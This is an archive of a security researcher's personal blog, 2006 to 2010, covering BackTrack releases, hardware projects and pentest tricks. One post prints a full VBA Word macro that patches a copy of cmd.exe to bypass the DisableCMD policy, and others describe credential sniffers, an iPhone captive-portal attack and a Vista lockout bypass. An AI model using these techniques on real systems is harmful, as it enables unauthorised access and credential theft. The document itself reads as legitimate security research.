Max's blog

Integrated blog into remote-exploit.org

2010-02-10T17:35:00.001+01:00

Hey people, since backtrack is now not on remote-exploit.org anymore, i decided to blog straight into the news area on the website so please go to http://www.remote-exploit.org for new posts.

greetings

max

18$ Gigabit ExpressCard Ethernet Works in Mac

2009-12-10T16:57:00.001+01:00

Wow, i am amazed. I just found the time to plug in the ExpressCard Ethernetadapter into my mac.

Tada... just works beautiful.. cool for just 18$ you cant go wrong.

http://www.dealextreme.com/details.dx/sku.16056

DisableCMD - History Repeating

2009-09-01T20:45:00.003+01:00

Before I start. This is nothing new! Actually its known since many years (e.g. http://blog.didierstevens.com/2007/11/28/quickpost-disableamd-disableregistryfools/)

During a pentest i needed to patch cmd.exe to ignore the disablecmd policy setting. Nothing new, nothing special, but i needed to do it from remote and i had to use VBA/Word macros. Long story short, i decided to release the code, because its nothing special and the technique is well known.

Here is a short video about it:

VBA Macro to remove DisableCMD CMD.EXE restriction from Max Moser on Vimeo.

Short video showing my VBA byte patcher written to overcome DisableCMD policy setting. Sorry but i at least expected a fail safe behavior.

I am not any good in coding vba but it might save someone some time. I will add an example.doc on remote-exploit.org as well.


Sub patchcmd()
Dim Sourcefile As String, TargetFile As String, Windir As String, Tempdir As String
Dim F1 As Integer, F2 As Integer
Dim bytepattern(19) As Byte
Dim WshShell As Object

Set WshShell = CreateObject("WScript.Shell")
Windir = WshShell.ExpandEnvironmentStrings("%WinDir%")
Tempdir = WshShell.ExpandEnvironmentStrings("%temp%")

bytepattern(0) = &H44 'D
bytepattern(1) = &H0
bytepattern(2) = &H69 'i
bytepattern(3) = &H0
bytepattern(4) = &H73 's
bytepattern(5) = &H0
bytepattern(6) = &H61 'a
bytepattern(7) = &H0
bytepattern(8) = &H62 'b
bytepattern(9) = &H0
bytepattern(10) = &H6C 'l
bytepattern(11) = &H0
bytepattern(12) = &H65 'e
bytepattern(13) = &H0
bytepattern(14) = &H43 'C
bytepattern(15) = &H0
bytepattern(16) = &H4D 'M
bytepattern(17) = &H0
bytepattern(18) = &H44 'D

Dim fileoffset As Long
fileoffset = 0
Dim patternoffset As Long
patternoffset = 0
Dim gotbad As Boolean

gotbad = False

Sourcefile = Windir & "\system32\cmd.exe"
Destfile = Tempdir & "\dmc.exe"
  
Dim tmpbyte As Byte

    If Dir(Sourcefile) = "" Then Exit Sub
    FileCopy Sourcefile, Destfile
    F1 = FreeFile
    Open Sourcefile For Binary As F1
    
    F2 = FreeFile
    Open Destfile For Binary As F2
    
    While Not EOF(F1)
        gotbad = False
        
        Get #F1, , tmpbyte
        If tmpbyte = bytepattern(patternoffset) Then
            fileoffset = (Seek(F1) - 1)
            
            While (gotbad = False)
                Get #F1, , tmpbyte
                    patternoffset = patternoffset + 1
                    If tmpbyte = bytepattern(patternoffset) Then
                        If patternoffset > 18 Then
                            'Debug.Print "Found DisableCMD and position: " & fileoffset & "Patching it now"
                            Put #F2, fileoffset + 6, &H34
                            Close F1
                            Close F2
                            MsgBox "Yeah, run it from: " & Destfile, vbOKOnly, "CMD.EXE patched"
                            End
                        End If
                    Else
                        patternoffset = 0
                        gotbad = True
                    End If
            Wend
        End If
    Wend
    Close F1
    Close F2
End Sub

Psnuffle password sniffer for metasploit

2009-08-10T13:27:00.004+01:00

I submitted a new version of the psnuffle credential sniffer addon to the metasploit team. Until HDM has reviewed it and merged it into the svn i uploaded a tgz to remote-exploit.org's code section http://www.remote-exploit.org/codes/psnuffle/psnuffle_rexploit_org_09082009.tar.gz Please note that it will be removed when its officially available within the metasploit svn. Checkout the demo video http://vimeo.com/6013518 if you like to see it in action. Currently i included pop3, imap, ftp and a HTTP Get sniffer module. Modules are very simple to code, so i expect new ones every few days.

Psnuffle credentials sniffing module demo from Max Moser on Vimeo.

With psnuffle metasploit got a credential sniffer in place. Its easy to use and extens. Writing a new module just takes some minutes.

Keykeriki on the new PCB's

2009-07-13T01:10:00.004+01:00

Today i just finished my first Keykeriki hardware on the professionally manufactured PCB's. When everything works fine, we can go into mass-production :-). There where no major problems during soldering, except that the pre-drilled holes for the antenna connector are to small. Simple to solve: Either cut of the ground connectors and solder it directly onto it or file the legs/connectors to a smaller shape using a dremel.

iUsability-Pwned!

2009-07-06T00:12:00.007+01:00

Lothar informed me about a strange behaviour of the iPhone running OS 3. It seems like the iPhone is automatically opening a browser when joining a network. (See video of the whole probleme here: http://www.vimeo.com/5466236)

The iPhone tries to do the following:

1. DNS querries for www.apple.com
2. Opening http://www.apple.com/library/test/success.html

When both are successful, then fine... the phone gets back "success" and everything is ok.
When both are failing... thats fine as well because then the phone assumes that the internet connection is not up and running.

BUT <-- isn't there always a BUT?!

If the phone can succcessfully querry the name but get back any different content than "Success"
it assumes that there is a captive portal which requires you to authenticate first to get access to the internet.

This is true for many hotspots etc... so Apple was thinking.. damn thats annoying for the user... lets open up
Safari automatically if this special case comes into place :-)

Usability kills security .... together with karmetasploit its a very evil thing. Get Iphones cookies, accounts and maybe even
system control... depending on the bugs you have left to test.

You can see the whole thing as a video @vimeo http://www.vimeo.com/5466236 .... now lets find some new safari bugs :-)

And thank you lothar for the fish.

Keykeriki faux-pas

2009-06-09T11:54:00.001+01:00

What a shame, we released the software package yesterday and removed the schematics at the same time. Sorry for that, both tar.gz's are now back on the website. Btw we have about 80 TRF7900 receiver chips in stock if someone want to build a Keykeriki, just contact us using email.

greetz

max

Keykeriki vs. Logitech Round 1

2009-06-04T15:55:00.004+01:00

Here is a picture of the information gathered using my Keykeriki and an oscilloscope. This image shows the sequence patterns needed to implement the parser for Logitech keyboards. Important side-note: Logitech uses standard miller symbols not the Microsoft variants.

If you dont know what Keykeriki is.. its an open-source, universal wireless keyboard sniffing project. Checkout

27Mhz Wireless Keyboard Sniffer Released

2009-06-01T17:13:00.001+01:00

1.5 years after releasing our whitepaper "27Mhz Wireless Keyboard Analysis Report" about wireless keyboard insecurities, we are proud to present the universal wireless keyboard sniffer: Keykeriki. This opensource hardware and software project enables every person to verify the security level of their own keyboard transmissions, and/or demonstrate the sniffing attacks (for educational purpose only). The hardware itself is designed to be small and versatile, it can be extended to currently undetected/unknown keyboard traffic, and/or hardware extensions, for example, a repeating module or amplifier. Checkout http://www.remote-exploit.org/Keykeriki.html for further information, schematics and more. We will provide pcb's as soon they are ready.

greetings

max

OSX 10.5.6 Mail crash and recover

2008-12-22T21:18:00.003+01:00

Well again we had a major security update on OSX. Guess what, yeah...apple mail terminates with segmentation fault during startup.

After researching and debugging around on my system i found out that GPGMail Bundle plugin was the Problem. Uninstall that Bundle from your $HOME/Library/Mail/Bundles directory.

Day saved...gpg back to console and over and out.

max

Locked yourself out of Vista?

2008-09-23T10:22:00.002+01:00

During some computer hardening work i managed to lock myself out of the system completely. Unfortunately it is a standalone system, so no re-apply domain gpo was possible. Also the restrictive firewall settings and sharing configuaration did not allow me to use any of the leet tricks like psexe, remote registry etc.

Because i still had physical access to the system i tried to delete the .pol file on the system at c:\Windows\System32\GroupPolicyUsers\

So i still was locked out and was trying every trick i know...until i came up to this one:

1) Download the chntpw iso at http://home.eunet.no/pnordahl/ntpasswd/bootdisk.html
2) Boot system with that one and use the registry editor to go to the SYSTEM hive
2) Cd into the Setup key
3) Edit the CmdLine value to cmd.exe
4) Edit the SetupType value to 2
5) Reboot and you will get a dosbox
6) Start mmc or gpoedit.msc
7) type Exit.

Coooool....

thanks to the original idea poster over here: http://forums.techarena.in/windows-security/678964.htm

Over 150'000 downloads in about a week

2008-06-30T07:37:00.002+01:00

Well I think it is amazing how far this Backtrack Project is gone. We already have over 150'000 Downloads since we released the version 3 at June 19th. This does not include any unofficial mirrors and/or torrents that are available. Roughly this translates in over 100Terrabyte of Data transmitted in ONE WEEK! When i see this number i would wish that i get only 1$ for every download :-)

Anyway i am impressed again and again by those numbers. Since years we keep the lines hot and the community able to test these great tools within an easy environment without the need of an installation. See you soon.

Even my mailbox praises me :-)

2008-06-25T11:51:00.002+01:00

Lately when i was checking my mail, i recognize a funny thing. Checkout the number of Messages :-) I must be real hacker then when even my mailbox praises me as 1337 :-)

See you later..same blog..different content

Backtrack 3 released today

2008-06-20T19:39:00.001+01:00

I am proud to announce that we have released backtrack yesterday at the
interview with pauldotcom.

Muts, Martin and I have slaved for weeks and months, together with the
help of many remote-exploit'ers to bring you this fine release. As
usual, this version overshadows the previous ones with extra cool
things.

Nessus

Unfortunately, Tenable would not allow for redistribution of Nessus.

Saint
Fortunately, SAINT *has* provided BackTrack users with a functional
version of SAINT, pending a free request for an IP range license
through the SAINT website, valid for 1 year.

Maltego
The guys over at Paterva have created a special version of Maltego
v2.0 with a community license especially for BackTrack users. We would
like to thank Paterva for co-operating with us and allowing us to
feature this amazing tool in BackTrack.

Kernel
2.6.21.5. Yes, yes, stop whining....We had serious deliberations
concerning the BT3 kernel. We decided not to upgrade to a newer kernel
as wireless injection patches were not fully tested and verified. We
did not want to jeopardize the awesome wireless capabilities of BT3
for the sake of sexiness or slightly increased hardware
compatibilities. All relevant security patches have been applied.

Tools
As usual, updated, sharpened, SVN'ed and armed to the teeth. This
release we have some special features such as spoonwep, fastrack and
other cool additions.

Availability
For the first time we distribute three different version of Backtrack 3
- CD Version
- USB Version with Compiz
- VMWare version including the VMWTools and some special Addons

Final Requests
We request the community to not mirror or torrent this release, or
otherwise distribute it online without our knowledge. We are trying to
gather precise statistics about bt3 downloads. If you would like to
mirror BT3 then please:

1) Think again! Traffic generated by BT3 downloads is CRAZY.
2) Please contact us before doing so.
3) Send us monthly statistics of downloads for the iso.

Rants

Problems, fixes, bugs, opinions - should all end up in our Remote
Exploit community forums, and our wiki:

http://forums.remote-exploit.org
http://wiki.remote-exploit.org

Over and out,

Max, Muts, Martin

How to kill and rescue a DX-7 Radio

2008-03-15T22:16:00.004+01:00

Well to be honest, i am no the best soldering guy but i managed after an initial learning curve (Killed a XBOX once) to extend my soldering skill. Now i liked the fact that i could extend the battery life of my radion controller by replacing the voltage regulator. You can find some details here: http://www.dimensionengineering.com/appnotes/spektrum_mod/spektrum_mod.htm

Now to the ugly part, i desoldered the old voltage regulator and everything whent fine, but i made a misstake with the last pin (VIN) and the pin comes of with the traces on the pcb (short piece of it). After screaming some strange sentences...i calmed and started to bring out my voltmeter and where looking for traces and lucky me i found some. Because VOUT and GND where still intact it was a piece of cake and did cost me only to add a small cable from another connector to the voltage regulator.

I did test it within my basement of the house and it seems to work. PUH! I have to test it in the wild maybe tomorrow. Anyway i am happy that now my readio is working again.

Here are some pictures:

1. The destructed traces (The most left one)
2. Completed fix (Still ugly soldering but i was very scary to kill others again

slow startup

2008-03-12T15:24:00.002+01:00

In the company we where shifting our office lately. Seems like the new office has some new challenges for me. After fighting like a ninja with my cable provider, we got internet again ! wooot.

Ok i guess you all are more interested on the progress on backtrack and my other funny projects. At the moment i work on an appliance we will deliver which will include a lot of specials. Because it will be based on BackTrack 3 i bug fix a lot of stuff. Gnuradio is making me crazy right now. Building that monster isn't that simple as it looks like :-) But when i am done with it i start porting lot of the keyboard research code into gnuradio modules.

Ok enough for right now i will continue when i got time and a bit more details.

thnx for reading.

Re-Vitalizing

2008-01-29T09:55:00.001+01:00

Well I was thinking a lot about this blog thing and i am still somewhat undecided. Sometimes i think that a lot of my work and progress is interesting to a lot of people but the other minute i think: "Hey do i really have to publish something before I am finished?". So i guess i am coming to a point during last weekend. I decided in re-vitalizing this blog and give it a try. Hope that the information wont be that useless as some other blogs but hey...its my blog :-)

Roger, Roger!

2007-03-17T10:05:00.000+01:00

During my trip to the CEBIT i was sitting in many TAXI cabs and one of them had seat, which reminds me on Star Wars. Check it out for yourself :-). Click on the photo to see all in the photo album.

Roger, Roger!

Greetings

Max

Microsoft don't trust anyone :-)

2007-02-08T21:38:00.000+01:00

Well tonight i write about a real funny story. I was installing Windows Vista. What a hell of a wasting time. Maybe its just me, but i believe that this thing has maybe strong security feature built in. But those "Are you shure...." buttons get on everyones nerves pretty soon. Who cares about protecting the system context using virtualisation, when every user is happy to click on "Yes" and installs a malware because he was so annoyed about his 1000000000th request to decide.

During my installation marathon i found something funny. Unfortunately its in german only. But take a look on the picture. I inserted the original vista DVD in the drive and he started the original Vista installer. As you can see, Vista is complaining that it is unsigned and from an unknown issuer.

Its very funny that Microsoft gets a lot of Money for signing but they don't do it for themselves...hmmm should you really trust in that installer executeable?

Have a nice evening..muhaaaaaa

New website content up and running

2007-01-26T08:29:00.000+01:00

Finally after multiple months of work we have the website up on a server. It will not be our finite home but at least our whole stuff is now back again. We now hoave a new comercial stuff section and Mjm & Shadz did an amazing pice of work. Checkout the new website at www.remote-exploit.org and give us feedback.

Remote exploit website is coming maybe this weekend

2007-01-24T12:59:00.000+01:00

When everything is going well, remote-exploit.org will get its new website and new content by this weekend. Stay tuned and thank mjm for his work. We all love him :-)

BackTrack 2 new base design

2007-01-24T12:53:00.000+01:00

well i just like to add here in my blog some progress myself or remote-exploit.org team is doing on certain topics. Today i just like to mention that Muts was working like hell to build the new base desing. Its still based on Slackware but not on SLAX as such. Add the modules we allready built have to be re-packaged and verified. We make good progress on in. Advantages we get from this: Much more modularization (Even in base stuff like kernel modules), Full Dual Core support (No more disabling the one of the cores), Lot of intel apple specific patches built in, Smaller iso size about 1/4 more space, based on standards and great anhancements for future developements.

Working on the new website

2006-11-26T23:09:00.001+01:00

Well our new website is in progress ShadZ did great work and i hope we can put it up very soon. Some new sections will be available and i hope that navigation is easier.

Development status on BackTrack

2006-11-26T23:04:00.000+01:00

Well i think i should paste some stuff about my BackTrack work. Well we are working on it a lot. But as you might heard muts is working a lot on http://www.offensive-security.com which is a spin-off product for online education related to BackTrack. Well currently the state on the the development is, that we still rebuild some packages and did release a small pre-release on the mirror.switch.ch but did not promote it in a large scale. You can provide us feedback in our forums.

Blog is created

2006-09-25T21:56:00.000+01:00

Wow, i have one!